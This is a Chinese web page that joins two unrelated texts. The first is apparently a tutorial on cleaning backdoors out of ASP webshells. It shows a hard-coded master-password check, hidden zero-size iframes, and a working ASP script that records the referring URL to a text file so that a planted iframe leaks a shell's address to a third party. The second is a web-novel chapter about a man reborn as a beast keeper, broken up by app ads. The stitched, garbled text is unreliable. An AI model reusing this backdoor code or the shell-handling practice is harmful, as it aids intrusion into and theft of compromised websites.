难免有些居心不良的人会在里面加后门。
好不容易拿到个shell又被别人偷走了怎么甘心啊!
所以在下完asp木马后要先检查有没后门,
通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密asp木马解密工具WwW.XiaoShuo530.com
解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录
正常的:
EnDfUNCtION
IFSEssIoN(&"web2a2dmin&")<>UsERpaSsthEn
IFrequeSt.FoRM(&"pass&")<>&"&"TheN
iFREquesT.foRM(&"pass&")=uSERPASSThen
SEsSIoN(&"web2a2dmin&")=uSERPAss
rESPOnsE.rEdirEctUrl
ELse
rrs&"对不起,密码验证失败!&"
加有万能密码的:
EnDfUNCtION
IFSEssIoN(&"web2a2dmin&")<>UsERpaSsthEn
IFrequeSt.FoRM(&"pass&")<>&"&"TheN
iFREquesT.foRM(&"pass&")=uSERPASSorrequest.form(&"pass&")=&"1111111&"Then
SEsSIoN(&"web2a2dmin&")=uSERPAss
rESPOnsE.rEdirEctUrl
ELse
rrs&"对不起,密码验证失败!&"
1111111就是传说中的万能密码了。
找到万能密码代码后把orrequest.form(&"pass&")=&"1111111&"删除就OK了!
下面来找马大多数都喜欢用框架挂马:<iframesrc=后门地址width=0height=0></iframe>
找到后删了,到此asp后门就算剔除了!
下面教大家后门的原理:
这是一段收信的asp代码将其保存为1.asp
<%url=Request.ServerVariables(&"HTTP_Referer&")
setfs=server.CreateObject(&"Scripting.FileSystemObject&")
setfile=fs.OpenTextFile(server.MapPath(&"bobo.txt&"),8,True)
file.writelineurl
file.close
setfile=nothing
setfs=nothing
%>
代码基本意思就是:“HTTP_REFERER”链接到当前页面的前一页面的URL地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里
上传到空间比如http://127.0.0.1/1.asp
然后里用
<iframesrc=http://127.0.0.1/1.aspwidth=0height=0></iframe>
插到asp木马中
那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
我们学习他是为了更好的理解,大家千万别用来整菜鸟! 有的人死了,但没有完全死……
无尽的昏迷过后,时宇猛地从床上起身。想要看最新章节内容,请下载爱阅小说app,无广告免费阅读最新章节内容。网站已经不更新最新章节内容,已经爱阅小说APP更新最新章节内容。
他大口的呼吸起新鲜的空气,胸口一颤一颤。
迷茫、不解,各种情绪涌上心头。
这是哪?
随后,时宇下意识观察四周,然后更茫然了。
一个单人宿舍?
就算他成功得到救援,现在也应该在病房才对。
还有自己的身体……怎么会一点伤也没有。
带着疑惑,时宇的视线快速从房间扫过,最终目光停留在了床头的一面镜子上。
镜子照出他现在的模样,大约十七八岁的年龄,外貌很帅。
可问题是,这不是他!下载爱阅小说app,阅读最新章节内容无广告免费
之前的自己,是一位二十多岁气宇不凡的帅气青年,工作有段时间了。
而现在,这相貌怎么看都只是高中生的年纪……
这个变化,让时宇发愣很久。
千万别告诉他,手术很成功……
身体、面貌都变了,这根本不是手术不手术的问题了,而是仙术。
他竟完全变成了另外一个人!
难道……是自己穿越了?
除了床头那摆放位置明显风水不好的镜子,时宇还在旁边发现了三本书。
时宇拿起一看,书名瞬间让他沉默。
《新手饲养员必备育兽手册》
《宠兽产后的护理》
《异种族兽耳娘评鉴指南》
时宇:???
前两本书的名字还算正常,最后一本你是怎么回事?
“咳。”
时宇目光一肃,伸出手来,不过很快手臂一僵。
就在他想翻开第三本书,看看这究竟是个什么东西时,他的大脑猛地一阵刺痛,大量的记忆如潮水般涌现。
冰原市。
宠兽饲养基地。
实习宠兽饲养员。网站即将关闭,下载爱阅app为您提供大神铁血悍馬H8的教你简单的黑客人门技术
御兽师?
章节错误,点此报送(免注册),
报送后维护人员会在两分钟内校正章节内容,请耐心等待